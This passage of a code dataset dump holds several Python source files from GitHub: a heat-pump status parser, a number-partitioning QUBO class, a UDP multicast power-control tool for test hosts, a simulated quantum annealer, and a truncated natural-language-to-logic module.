((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[10],\n \"name\": \"Status der Wärmepumpenkomponenten: Solarbetrieb\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # \"I51.11\" : \"state_cooling4way\" : \"Status der Wärmepumpenkomponenten: 4-Wegeventil im Kältekreis\"\n #\n try:\n val = data[\"I51\"]\n key = \"state_cooling4way\"\n if val[\"status\"]:\n self.__data[key] = {\n \"key\": key,\n \"value\": ((\"{:08b}\".format(int(val[\"value\"])))[::-1] + '00000000000')[11],\n \"name\": \"Status der Wärmepumpenkomponenten: 4-Wegeventil im Kältekreis\",\n \"unit\": \"\",\n \"time\": val[\"time\"],\n \"status\": True\n }\n logging.debug(\n \"{0} = {1} {2}\".format(self.__data[key][\"key\"], self.__data[key][\"value\"],\n self.__data[key][\"unit\"]))\n else:\n self.__data[key][\"status\"] = False\n except KeyError:\n pass\n\n #\n # print()\n pass\n","repo_name":"dk3qu/heatpump_2_mqtt","sub_path":"collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":22795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10373891522","text":"import numpy as np\n\nfrom ..utilities import check_kwargs\nfrom .problem import Problem\nfrom .qubo import QUBO\n\n\nclass NumberPartition(Problem):\n \"\"\"\n Creates an instance of the Number Partitioning problem.\n\n Parameters\n ----------\n numbers: List[int]\n The list of numbers to be partitioned.\n\n Returns\n -------\n An instance of the Number Partitioning problem.\n \"\"\"\n\n __name__ = \"number_partition\"\n\n def __init__(self, numbers=None):\n # Set the numbers to be partitioned. If not given, generate a random list with integers\n self.numbers = numbers\n self.n_numbers = None if numbers == None else len(self.numbers)\n\n @property\n def numbers(self):\n return self._numbers\n\n @numbers.setter\n def numbers(self, input_numbers):\n if not isinstance(input_numbers, list):\n raise TypeError(\"The input parameter, numbers, has to be a list\")\n\n for each_entry in input_numbers:\n if not isinstance(each_entry, int):\n raise TypeError(\"The elements in numbers list must be of type int.\")\n\n self._numbers = input_numbers\n\n @staticmethod\n def random_instance(**kwargs):\n \"\"\"\n Creates a random instance of the Number Partitioning problem.\n\n Parameters\n ----------\n n_numbers: int\n The number of numbers to be partitioned. This is a required keyword argument.\n\n Returns\n -------\n A random instance of the Number Partitioning problem.\n \"\"\"\n n_numbers = check_kwargs([\"n_numbers\"], [None], **kwargs)\n\n # Set a random number generator\n seed = kwargs.get(\"seed\", None)\n seed = seed if isinstance(seed, int) else None\n rng = np.random.default_rng(seed)\n\n numbers = list(map(int, rng.integers(1, 10, size=n_numbers)))\n return NumberPartition(numbers)\n\n @property\n def qubo(self):\n \"\"\"\n Returns the QUBO encoding of this problem.\n\n Returns\n -------\n The QUBO encoding of this problem.\n \"\"\"\n terms = []\n weights = []\n constant_term = 0\n\n # Consider every pair of numbers (ordered)\n for i in range(self.n_numbers):\n for j in range(i, self.n_numbers):\n # If i equals j, then whatever random sign we choose, if we square\n # it we can back 1. 
So we have a constant term.\n if i == j:\n constant_term += self.numbers[i] * self.numbers[j]\n\n # Otherwise the weight is computed as being the product of the\n # numbers in the pair, multiplied by 2 (since we account for\n # both pair (i, j) and (j, i)\n else:\n term = [i, j]\n weight = 2 * self.numbers[i] * self.numbers[j]\n\n terms.append(term)\n weights.append(weight)\n\n # If the constant term is non-zero, we may add it to terms and weights\n if constant_term > 0:\n terms.append([])\n weights.append(constant_term)\n\n return QUBO(self.n_numbers, terms, weights, self.problem_instance)\n","repo_name":"entropicalabs/openqaoa","sub_path":"src/openqaoa-core/openqaoa/problems/numberpartition.py","file_name":"numberpartition.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"31"} +{"seq_id":"24894011182","text":"import argparse\nimport socket\nimport struct\nimport sys\nimport timeit\n\nfrom ifconfig import get_mgmt_iface\nfrom utils import get_atf_logger, get_host_number\n\nSCRIPT_STATUS_SUCCESS = \"[PCONTROL-SUCCESS]\"\nSCRIPT_STATUS_FAILED = \"[PCONTROL-FAILED]\"\n\nlog = get_atf_logger()\n\nUDP_GROUP = \"225.0.0.37\"\nUDP_PORT = 24852\n\nUDP_MAGIC = 0xC001\n\nUDP_CMD = {\n \"PING\": 0x00,\n \"RESET\": 0x01,\n \"POWER\": 0x02,\n \"OFF\": 0x03,\n \"STATUS\": 0x04,\n \"COLD\": 0x05,\n \"CH\": 0x06,\n \"GPIO\": 0x07\n}\n\nUDP_STATUS = {\n \"NACK\": 0x80,\n \"ACK\": 0x81,\n \"RES\": 0x82,\n \"HDD\": 0x83,\n \"LED\": 0x84,\n \"PWR\": 0x85,\n \"STB\": 0x86,\n \"VCC\": 0x87,\n \"CH\": 0x88,\n \"GPIO\": 0x89\n}\n\nGPIO_ENABLE = 1\nGPIO_DISABLE = 0\n\nPIN_GPIO = 8\n\n\ndef check_host(func):\n def wrapper(*args, **kwargs):\n if isinstance(args[1], str):\n args_list = list(args)\n args_list[1] = get_host_number(args[1])\n args = tuple(args_list)\n\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass PControlPacket(object):\n def __init__(self, to_id=None, data=None):\n self.magic = UDP_MAGIC\n self.pid = 0\n self.from_id = 0\n self.to_id = to_id if to_id is not None else 0\n self.seen = 0\n if data is not None:\n self.len = len(data)\n self.data = data\n else:\n self.len = 0\n self.data = b\"\"\n\n def to_string(self):\n return struct.pack(\"!IIIIIB\", self.magic, self.pid, self.from_id, self.to_id, self.seen, self.len) + self.data\n\n @staticmethod\n def from_string(s):\n hdr_len = struct.calcsize(\"!IIIIIB\")\n p = PControlPacket()\n\n p.magic, p.pid, p.from_id, p.to_id, p.seen, p.len = struct.unpack(\"!IIIIIB\", s[:hdr_len])\n p.data = s[hdr_len:hdr_len + p.len]\n\n return p\n\n def dump(self):\n log.info(\"[PControl]\")\n log.info(\" magic = 0x{:x}\".format(self.magic))\n log.info(\" pid = {}\".format(self.pid))\n log.info(\" from_id = {}\".format(self.from_id))\n log.info(\" to_id = {}\".format(self.to_id))\n log.info(\" seen = {}\".format(self.seen))\n log.info(\" len = {}\".format(self.len))\n log.info(\" data = {} [{}]\".format(self.data.encode(\"hex\"), PControlPacket.get_command_name(\n struct.unpack(\"B\", self.data[0])[0] if self.len else 0xFF)))\n\n @staticmethod\n def get_command_name(to_id):\n for name, val in UDP_CMD.iteritems():\n if val == to_id:\n return \"UDP_CMD_{}\".format(name)\n for name, val in UDP_STATUS.iteritems():\n if val == to_id:\n return \"UDP_STATUS_{}\".format(name)\n return \"unknown\"\n\n @staticmethod\n def get_ping_cmd_data():\n return struct.pack(\"B\", UDP_CMD[\"PING\"])\n\n @staticmethod\n def get_reset_cmd_data(length=200, delay=0):\n return 
struct.pack(\"!Bii\", UDP_CMD[\"RESET\"], length, delay)\n\n @staticmethod\n def get_power_cmd_data(length=200, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"POWER\"], length, delay)\n\n @staticmethod\n def get_off_cmd_data(length=10000, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"OFF\"], length, delay)\n\n @staticmethod\n def get_status_cmd_data():\n return struct.pack(\"B\", UDP_CMD[\"STATUS\"])\n\n @staticmethod\n def get_cold_cmd_data(length=10000, delay=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"COLD\"], length, delay)\n\n @staticmethod\n def get_ch_cmd_data(channel=0, length=10000, delay=0):\n return struct.pack(\"!Biii\", UDP_CMD[\"CH\"], channel, length, delay)\n\n @staticmethod\n def get_gpio_cmd_data(gpio=0, on_off=0):\n return struct.pack(\"!Bii\", UDP_CMD[\"GPIO\"], gpio, on_off)\n\n\nclass PControl(object):\n PING_TIMEOUT = 2.0\n STATUS_TIMEOUT = 2.0\n\n def __init__(self):\n self.local_ip = get_mgmt_iface()[2]\n\n def get_udp_socket(self):\n # Create a UDP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # Allow reuse of addresses\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n # Set multicast interface to local_ip\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.local_ip))\n\n # Set multicast time-to-live to 2...should keep our multicast packets from escaping the local network\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)\n\n # Construct a membership request...tells router what multicast group we want to subscribe to\n membership_request = socket.inet_aton(UDP_GROUP) + socket.inet_aton(self.local_ip)\n\n # Send add membership request to socket\n # See http://www.tldp.org/HOWTO/Multicast-HOWTO-6.html for explanation of sockopts\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership_request)\n\n # Bind socket to group to be able ro receive messages\n if sys.platform == \"win32\":\n sock.bind((self.local_ip, UDP_PORT))\n elif sys.platform == \"darwin\" or \"freebsd\" in sys.platform:\n sock.bind((\"\", UDP_PORT))\n else:\n sock.bind((UDP_GROUP, UDP_PORT))\n\n return sock\n\n def _send_pcontrol_packet(self, p, s=None):\n if s is None:\n sock = self.get_udp_socket()\n else:\n sock = s\n\n try:\n log.info(\"Sending next Power Control packet:\")\n p.dump()\n sock.sendto(p.to_string(), (UDP_GROUP, UDP_PORT))\n finally:\n if s is None:\n sock.close()\n\n @check_host\n def ping(self, to_id):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n p = PControlPacket(to_id, PControlPacket.get_ping_cmd_data())\n self._send_pcontrol_packet(p, sock)\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.PING_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 0:\n cmd = struct.unpack(\"B\", p.data[0])[0]\n if cmd == UDP_STATUS[\"ACK\"]:\n return True\n elif cmd == UDP_STATUS[\"NACK\"]:\n return False\n finally:\n sock.close()\n\n return False\n\n @check_host\n def reset(self, to_id, length=200, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_reset_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def power(self, to_id, length=200, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_power_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def off(self, to_id, length=10000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_off_cmd_data(length, delay))\n 
self._send_pcontrol_packet(p)\n\n @check_host\n def status(self, to_id):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n p = PControlPacket(to_id, PControlPacket.get_status_cmd_data())\n self._send_pcontrol_packet(p, sock)\n\n led_val = -1\n vcc_val = -1\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.STATUS_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 1:\n cmd, val = struct.unpack(\"BB\", p.data[:2])\n if cmd == UDP_STATUS[\"LED\"]:\n led_val = val\n if cmd == UDP_STATUS[\"VCC\"]:\n vcc_val = val\n if led_val >= 0 and vcc_val >= 0:\n log.info(\"Power Control {}: LED = {}, VCC = {}\".format(to_id, led_val, vcc_val))\n return led_val, vcc_val\n finally:\n sock.close()\n\n raise Exception(\"Failed to get status of Power Control {} (it probably doesn't exist)\".format(to_id))\n\n @check_host\n def cold(self, to_id, length=1000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_cold_cmd_data(length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def ch(self, to_id, channel=0, length=10000, delay=0):\n p = PControlPacket(to_id, PControlPacket.get_ch_cmd_data(channel, length, delay))\n self._send_pcontrol_packet(p)\n\n @check_host\n def gpio(self, to_id, gpio=0, on_off=0, check=True):\n p = PControlPacket(to_id, PControlPacket.get_gpio_cmd_data(gpio, on_off))\n\n if not check:\n self._send_pcontrol_packet(p)\n return\n\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n\n self._send_pcontrol_packet(p, sock)\n\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < PControl.STATUS_TIMEOUT:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n if p.from_id == to_id and p.len > 2:\n cmd, p_gpio, p_on_off = struct.unpack(\"BBB\", p.data[:3])\n if cmd == UDP_STATUS[\"GPIO\"] and p_gpio == gpio:\n log.info(\"Power Control {}: GPIO {} = {}\".format(to_id, gpio, p_on_off))\n return bool(p_on_off)\n finally:\n sock.close()\n\n raise Exception(\"Failed to set GPIO {} = {} on Power Control {} \"\n \"(Power Control doesn't exist or firmware is old)\".format(gpio, on_off, to_id))\n\n def listen(self, timeout=10):\n sock = self.get_udp_socket()\n\n try:\n sock.setblocking(False)\n start_time = timeit.default_timer()\n while timeit.default_timer() - start_time < timeout:\n try:\n data = sock.recv(1024)\n except socket.error:\n continue\n p = PControlPacket.from_string(data)\n p.dump()\n finally:\n sock.close()\n\n\nclass PcontrolArgumentParser(argparse.ArgumentParser):\n def error(self, message):\n log.info(\"\\n{}\\n\".format(SCRIPT_STATUS_FAILED))\n self.exit(2, \"{}: error: {}\\n\".format(self.prog, message))\n\n\nif __name__ == \"__main__\":\n parser = PcontrolArgumentParser()\n parser.add_argument(\"-n\", \"--name\", help=\"Host to perform action\",\n type=str, required=True)\n parser.add_argument(\"-c\", \"--command\", help=\"Command to be performed\",\n choices=[\"reset\", \"power\", \"off\", \"cold\", \"status\", \"ping\", \"offch\", \"gpio\"],\n type=str, required=True)\n parser.add_argument(\"-l\", \"--length\", help=\"Length of the command\",\n type=int, default=200)\n parser.add_argument(\"-d\", \"--delay\", help=\"Delay before command\",\n type=int, default=0)\n parser.add_argument(\"--ch, --channel\", dest=\"channel\", help=\"Channel to turn off (for 12V module)\",\n type=int)\n args = parser.parse_args()\n\n 
try:\n p = PControl()\n\n if args.command == \"ping\":\n ping_status = p.ping(args.name)\n log.info(\"PING = {}\".format(ping_status))\n elif args.command == \"reset\":\n p.reset(args.name, args.length, args.delay)\n elif args.command == \"power\":\n p.power(args.name, args.length, args.delay)\n elif args.command == \"off\":\n p.off(args.name, args.length, args.delay)\n elif args.command == \"status\":\n led_status = p.status(args.name)[0]\n log.info(\"LED = {}\".format(led_status))\n elif args.command == \"cold\":\n p.cold(args.name, args.length, args.delay)\n elif args.command == \"offch\":\n if args.channel is None:\n raise Exception(\"To perform 'offch' command, channel must be specified\")\n p.ch(args.name, args.channel, args.length, args.delay)\n elif args.command == \"gpio\":\n gpio_status = p.gpio(args.name, args.length, args.delay)\n log.info(\"GPIO = {}\".format(gpio_status))\n except Exception as e:\n log.exception(e.message)\n log.exception(SCRIPT_STATUS_FAILED)\n exit(1)\n\n log.info(SCRIPT_STATUS_SUCCESS)\n","repo_name":"dgubanovv/qa-tests","sub_path":"tools/pcontrol.py","file_name":"pcontrol.py","file_ext":"py","file_size_in_byte":12698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5543770565","text":"from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport thesis_qubo\nfrom . import formulas\nfrom thesis_qubo.common import checkers, symmetrize\nfrom types import MethodType\nfrom thesis_qubo import algorithm as algo\n\nclass DenseGraphAnnealer :\n def __init__(self, W, optimize, prefdict) :\n if not W is None :\n self.set_qubo(W, optimize)\n self._select_algorithm(algo.coloring)\n self.set_preferences(prefdict)\n\n def seed(self, seed) :\n pass\n \n def _vars(self) :\n return self._h, self._J, self._c, self._q\n \n def get_problem_size(self) :\n return self._N;\n\n def set_qubo(self, W, optimize = thesis_qubo.minimize) :\n\n checkers.dense_graph.qubo(W)\n # W = symmetrize(W)\n\n h, J, c = formulas.dense_graph_calculate_hamiltonian(W)\n self._optimize = optimize\n self._h, self._J, self._c = optimize.sign(h), optimize.sign(J), optimize.sign(c)\n self._N = W.shape[0]\n self._m = self._N // 4\n \n def set_hamiltonian(self, h, J, c) :\n\n checkers.dense_graph.hJc(h, J, c)\n J = symmetrize(J)\n self._optimize = thesis_qubo.minimize\n self._h, self._J, self._c = h, J, c\n self._N = J.shape[0]\n self._m = self._N // 2\n \n def _select_algorithm(self, algoname) :\n if algoname == algo.coloring :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_coloring, self)\n elif algoname == algo.sa_naive :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_sa_naive, self)\n elif algoname == algo.sa_default :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_sa_naive, self)\n else :\n self.anneal_one_step = \\\n MethodType(DenseGraphAnnealer.anneal_one_step_naive, self)\n\n def _get_algorithm(self) :\n if self.anneal_one_step.__func__ == DenseGraphAnnealer.anneal_one_step_coloring :\n return algo.coloring;\n if self.anneal_one_step.__func__ == DenseGraphAnnealer.anneal_one_step_sa_naive :\n return algo.sa_naive;\n return algo.naive\n \n def set_preferences(self, prefdict = None, **prefs) :\n if not prefdict is None :\n self._set_prefdict(prefdict)\n self._set_prefdict(prefs)\n \n def _set_prefdict(self, prefdict) :\n v = prefdict.get('n_trotters')\n if v is not None :\n self._m = v;\n v = 
prefdict.get('algorithm')\n if v is not None :\n self._select_algorithm(v)\n\n def get_preferences(self) :\n prefs = { }\n if hasattr(self, '_m') :\n prefs['n_trotters'] = self._m\n prefs['algorithm'] = self._get_algorithm()\n return prefs\n \n def get_optimize_dir(self) :\n return self._optimize\n\n def get_E(self) :\n h, J, c, q = self._vars()\n E = formulas.dense_graph_batch_calculate_E_from_spin(h, J, c, q)\n return self._optimize.sign(E)\n\n def get_x(self) :\n x = []\n for idx in range(self._m) :\n xtmp = thesis_qubo.bit_from_spin(self._q[idx])\n x.append(xtmp)\n return x\n\n def set_q(self, q) :\n\n if q.dtype != np.int8 :\n q = np.asarray(q, np.int8)\n self._q[:] = q\n\n def set_qset(self, q) :\n\n self._m = len(q)\n self.prepare()\n qlist = q\n for idx in range(len(qlist)) :\n q = qlist[idx]\n if q.dtype != np.int8 :\n q = np.asarray(q, np.int8)\n self._q[idx] = q\n \n # Ising model\n\n def get_hamiltonian(self) :\n return np.copy(self._h), np.copy(self._J), self._c\n\n def get_q(self) :\n return np.copy(self._q)\n \n def randomize_spin(self) :\n thesis_qubo.randomize_spin(self._q)\n\n def calculate_E(self) :\n pass\n \n def prepare(self) :\n if self._m == 1 :\n self._select_algorithm(algo.sa_naive)\n self._q = np.empty((self._m, self._N), dtype=np.int8)\n\n def make_solution(self) :\n pass\n\n def get_system_E(self, G, beta) :\n # average energy\n E = np.mean(self.get_E())\n \n m = self._m\n algo = self._get_algorithm()\n if thesis_qubo.algorithm.is_sqa(algo) :\n q = self._q\n spinDotSum = 0.\n for im in range(m) :\n q0 = np.asarray(q[im], np.float64)\n q1 = np.asarray(q[(im + 1) % m], np.float64)\n spinDotSum += q0.dot(q1)\n E -= 0.5 / beta * np.log(np.tanh(G * beta / m)) * spinDotSum\n \n return E\n \n def anneal_one_step(self, G, beta) :\n # will be dynamically replaced.\n pass\n \n def anneal_one_step_naive(self, G, beta) :\n\n h, J, c, q = self._vars()\n N = self._N\n m = self._m\n two_div_m = 2. / np.float64(m)\n coef = np.log(np.tanh(G * beta / m)) / beta\n \n for i in range(self._N * self._m):\n x = np.random.randint(N)\n y = np.random.randint(m)\n qyx = q[y][x]\n sum = np.dot(J[x], q[y]); # diagnoal elements in J are zero.\n dE = two_div_m * qyx * (h[x] + 2. * sum)\n dE -= qyx * (q[(m + y - 1) % m][x] + q[(y + 1) % m][x]) * coef\n threshold = 1. if (dE <= 0.) else np.exp(-dE * beta)\n if threshold > np.random.rand():\n q[y][x] = - qyx\n\n def anneal_colored_plane(self, G, beta, offset) :\n h, J, c, q = self._vars()\n N = self._N\n m = self._m\n two_div_m = 2. / np.float64(m)\n coef = np.log(np.tanh(G * beta / m)) / beta\n \n for y in range(self._m):\n x = (offset + np.random.randint(1 << 30) * 2) % N\n qyx = q[y][x]\n sum = np.dot(J[x], q[y]); # diagnoal elements in J are zero.\n dE = two_div_m * qyx * (h[x] + 2 * sum)\n dE -= qyx * (q[(m + y - 1) % m][x] + q[(y + 1) % m][x]) * coef\n threshold = 1. if (dE <= 0.) else np.exp(-dE * beta)\n if threshold > np.random.rand():\n q[y][x] = - qyx\n \n def anneal_one_step_coloring(self, G, beta) :\n for loop in range(0, self._N) :\n self.anneal_colored_plane(G, beta, 0)\n self.anneal_colored_plane(G, beta, 1)\n \n def anneal_one_step_sa_naive(self, kT, _) :\n h, J, c, q = self._vars()\n N = self._N\n invKT = 1. / kT\n\n for iq in range(self._m) :\n qm = q[iq]\n for i in range(self._N):\n x = np.random.randint(N)\n qx = qm[x]\n sum = np.dot(J[x], qm); # diagnoal elements in J are zero.\n dE = 2. * qx * (h[x] + 2. * sum)\n threshold = 1. if (dE <= 0.) 
else np.exp(- dE * invKT)\n if threshold > np.random.rand():\n qm[x] = - qx\n\n \ndef dense_graph_annealer(W = None, optimize = thesis_qubo.minimize, **prefs) :\n an = DenseGraphAnnealer(W, optimize, prefs)\n return an\n\n\nif __name__ == '__main__' :\n\n np.random.seed(0)\n Ginit = 5.\n Gfin = 0.01\n \n nRepeat = 4\n beta = 1. / 0.02\n tau = 0.99\n \n N = 8\n m = 4\n W = np.array([[-32,4,4,4,4,4,4,4],\n [4,-32,4,4,4,4,4,4],\n [4,4,-32,4,4,4,4,4],\n [4,4,4,-32,4,4,4,4],\n [4,4,4,4,-32,4,4,4],\n [4,4,4,4,4,-32,4,4],\n [4,4,4,4,4,4,-32,4],\n [4,4,4,4,4,4,4,-32]])\n \n\n #N = 20\n #m = 10\n\n algoname = algo.default\n # algo = DenseGraphAnnealer.naive\n ann = dense_graph_annealer(W, thesis_qubo.minimize, n_trotters=m)\n ann.set_preferences(algorithm = algo.naive)\n \n for loop in range(0, nRepeat) :\n G = Ginit\n ann.prepare()\n ann.randomize_spin()\n while Gfin < G :\n ann.anneal_one_step(G, beta)\n G = G * tau\n\n ann.make_solution()\n E = ann.get_E()\n #x = ann.get_x()\n print(E) # ,x\n\n prefs = ann.get_preferences()\n print(prefs)\n \n ann = dense_graph_annealer(W, thesis_qubo.maximize)\n ann.set_preferences(prefs)\n for loop in range(0, nRepeat) :\n G = Ginit\n ann.prepare()\n ann.randomize_spin()\n while Gfin < G :\n ann.anneal_one_step(G, beta)\n G = G * tau\n\n ann.make_solution()\n E = ann.get_E()\n #x = ann.get_x()\n print(E) # ,x\n\n prefs = ann.get_preferences()\n print(prefs)\n","repo_name":"masterpradipg/thesis-work","sub_path":"qubo/ewb_matching/py/dense_graph_annealer.py","file_name":"dense_graph_annealer.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30747367790","text":"from multiprocessing import context\nimport sys\n\nfrom requests import get\n\n# ==== import other source files ====\n\n# configuration and other globals are in nlpglobals.py\nfrom nlpglobals import *\n\n# small utilities are in nlputils.py\nfrom nlputils import *\n\n# uncertainty analysis and encoding is in nlpuncertain\nfrom nlpuncertain import *\n\n# pronoun guessing\nfrom nlppronoun import *\n\nfrom nlpobjlogic import *\n\nimport nlptologic\n#from nlptologic import build_property_logic\n\n# ======= globals used and changed during work ===\n\n#constant_nr=0 # new constants created add a numeric suffic, incremented\ndefinition_nr=0 # new definitions created add a numeric suffic, incremented\n\nnoframes=False # set True for debugging: no new frames generated, no frame vars\nnoframevars=False # if true, instead of framevar we use number 1\nnonewframes=True # if true, no new frames generated\n\n# ===== tips for development =====\n\n\n# =============== proper logic building ================================\n\n\ndef build_sentence_proper_logic(ctxt,sentence,tree,iscondition=False,isconsequence=False,confidence=1):\n #debug_print(\"build_sentence_proper_logic tree\",tree)\n if not tree: return tree\n if type(tree)==str: return tree\n if type(tree)==dict: return tree\n if type(tree[0])==dict: return tree\n if tree[0] in [\"svo\",\"sv\"]:\n treeroot=tree[1][0]\n parent=get_parent(sentence,treeroot)\n if parent:\n confidence=get_subsentence_confidence(ctxt,sentence,parent)\n #debug_print(\"build_sentence_proper_logic confidence\",confidence) \n if confidence==0:\n return None \n \n sentlogic=build_single_subsentence_proper_logic(ctxt,sentence,tree,iscondition,isconsequence,confidence,None) \n sentlogic=merge_framevars(sentlogic) \n #debug_print(\"build_sentence_proper_logic sentlogic\",sentlogic) \n 
#debug_print(\"build_sentence_proper_logic ctxt\",ctxt) \n return sentlogic\n \n elif tree[0] in [\"ref\"]:\n ref=tree[1][1:]\n #debug_print(\"ref\",ref)\n sys.exit(0) \n elif tree[0] in [\"if\"]:\n res=[tree[0]]\n tmp1=build_sentence_proper_logic(ctxt,sentence,tree[1],True,False)\n tmp2=build_sentence_proper_logic(ctxt,sentence,tree[2],False,True)\n \n #debug_print(\"tmp1\",tmp1) \n #debug_print(\"tmp2\",tmp2) \n\n tmp1=remove_logic_annotations(tmp1)\n tmp1=prop_flatten_logic_term(tmp1)\n tmp2=remove_logic_annotations(tmp2) \n tmp2=prop_flatten_logic_term(tmp2)\n\n tmp1vars=collect_free_vars(tmp1)\n tmp2vars=collect_free_vars(tmp2)\n if tmp2vars and not tmp1vars and tmp1 and tmp1[0] in [\"exists\",\"forall\"]:\n # \"if some red elephant is big, it is nice\"\n # not tmp1vars in order to not fire for \"if person has a nice car, he is happy\"\n tmp1=tmp1[2]\n elif not(tmp2vars) and tmp1vars:\n # \"if rabbits are big, elephants are strong\"\n # \"if person has a nice car, he is happy\"\n tmp1=[\"forall\",tmp1vars,tmp1]\n\n #debug_print(\"tmp1 +\",tmp1) \n #debug_print(\"tmp2 +\",tmp2)\n\n res=[tmp1,\"=>\",tmp2]\n #debug_print(\"res\",res) \n vars=collect_free_vars(res)\n #debug_print(\"vars\",vars) \n if vars:\n res=[\"forall\",vars,res] \n res=[\"logic\",tree,res] \n return res \n elif tree[0] in [\"and\",\"or\",\"if\",\"unless\",\"nor\",\"xor\", \"seq\"]:\n res=[tree[0]]\n for el in tree[1:]:\n tmp=build_sentence_proper_logic(ctxt,sentence,el,iscondition,isconsequence)\n res.append(tmp)\n res=prop_flatten_logic_term(res) \n return res\n else:\n #res=prop_flatten_logic_term(res) \n return tree \n\n\ndef get_subsentence_confidence(ctxt,sentence,parent):\n #debug_print(\"get_subsentence_confidence parent\",parent)\n if not parent: return 1\n polarity=1\n if parent[\"upos\"] in [\"ADJ\"] and parent[\"lemma\"] in [\"false\"]:\n polarity=-1 \n confidence=get_word_confidence(ctxt,sentence,parent) \n confidence=polarity*confidence \n polarity2=get_word_polarity(ctxt,sentence,parent)\n if not polarity2: confidence=-1*confidence\n elif parent[\"upos\"] in [\"ADJ\"] and parent[\"lemma\"] in [\"true\"]:\n polarity=1 \n confidence=get_word_confidence(ctxt,sentence,parent) \n confidence=polarity*confidence\n polarity2=get_word_polarity(ctxt,sentence,parent)\n if not polarity2: confidence=-1*confidence \n else:\n #confidence=1\n confidence=get_lemma_confidence(sentence,parent[\"lemma\"]) \n if confidence!=1:\n polarity=get_word_polarity(ctxt,sentence,parent)\n if not polarity: confidence=-1*confidence \n\n #debug_print(\"get_subsentence_confidence polarity\",polarity)\n #debug_print(\"get_subsentence_confidence confidence\",confidence)\n return confidence\n\n\n\ndef build_single_subsentence_proper_logic(ctxt,sentence,tree,\n iscondition=False,isconsequence=False,top_confidence=1,parent_object_pair=None): \n #debug_print(\"build_single_subsentence_proper_logic tree\",tree)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n #debug_print(\"ctxt[isquestion]\",ctxt[\"isquestion\"])\n #debug_print(\"build_single_subsentence_proper_logic parent_object_pair\",parent_object_pair)\n #debug_print(\"ctxt[objects] at the beginning of build_single_subsentence_proper_logic\",ctxt[\"objects\"])\n #debug_print(\"-----------------------------------\")\n #debug_print(\"build_single_subsentence_proper_logic top_confidence\",top_confidence)\n #debug_print(\"build_single_subsentence_proper_logic iscondition\",iscondition)\n\n svo=tree[1][1:]\n #debug_print(\"svo\",svo)\n subjpart=svo[0]\n verbpart=svo[1]\n if 
len(svo)>2: \n objpart=svo[2]\n else:\n objpart=None \n #debug_print(\"verbpart\",verbpart)\n verb=verbpart\n subj_logic=None\n if (type(verbpart)==dict and type(subjpart)==dict and \n (\"relatedobjects\" in verbpart) and (subjpart[\"upos\"] in [\"PRON\"]) and \n subjpart[\"lemma\"] in [\"which\",\"that\",\"who\",\"what\"]):\n #John liked the forest which was bought by Mary.\n prev=get_previous_word(sentence,subjpart)\n if prev:\n for el in verbpart[\"relatedobjects\"]:\n if (el[\"case\"][\"lemma\"]==\"by\" and (\"obj\" in el)):\n # ... which was bought by Mary \n #debug_print(\"reversed!\") \n objpart=prev\n subjpart=el[\"proplogic\"]\n break\n\n object_data=None\n object=None\n object_quant=None\n svar=None\n subject_quantifier=None\n sentence_type=None\n relatedobject=None\n relation_word=None\n\n #debug_print(\"objpart\",objpart)\n\n if (type(verb)==dict and verb[\"lemma\"] in [\"be\"] and not \"relation\" in verb and\n \"relatedobjects\" in verb): \n related=verb[\"relatedobjects\"] \n for el in related:\n if \"case\" in el and \"proplogic\" in el and el[\"case\"][\"lemma\"] in [\"of\"]:\n # Elephants are afraid of mice\n sentence_type=\"is_of\"\n relation_word=objpart\n relatedobject=el\n objpart=relatedobject[\"obj\"] \n break\n \n if objpart:\n #debug_print(\"build_single_subsentence_proper_logic objpart\",objpart)\n 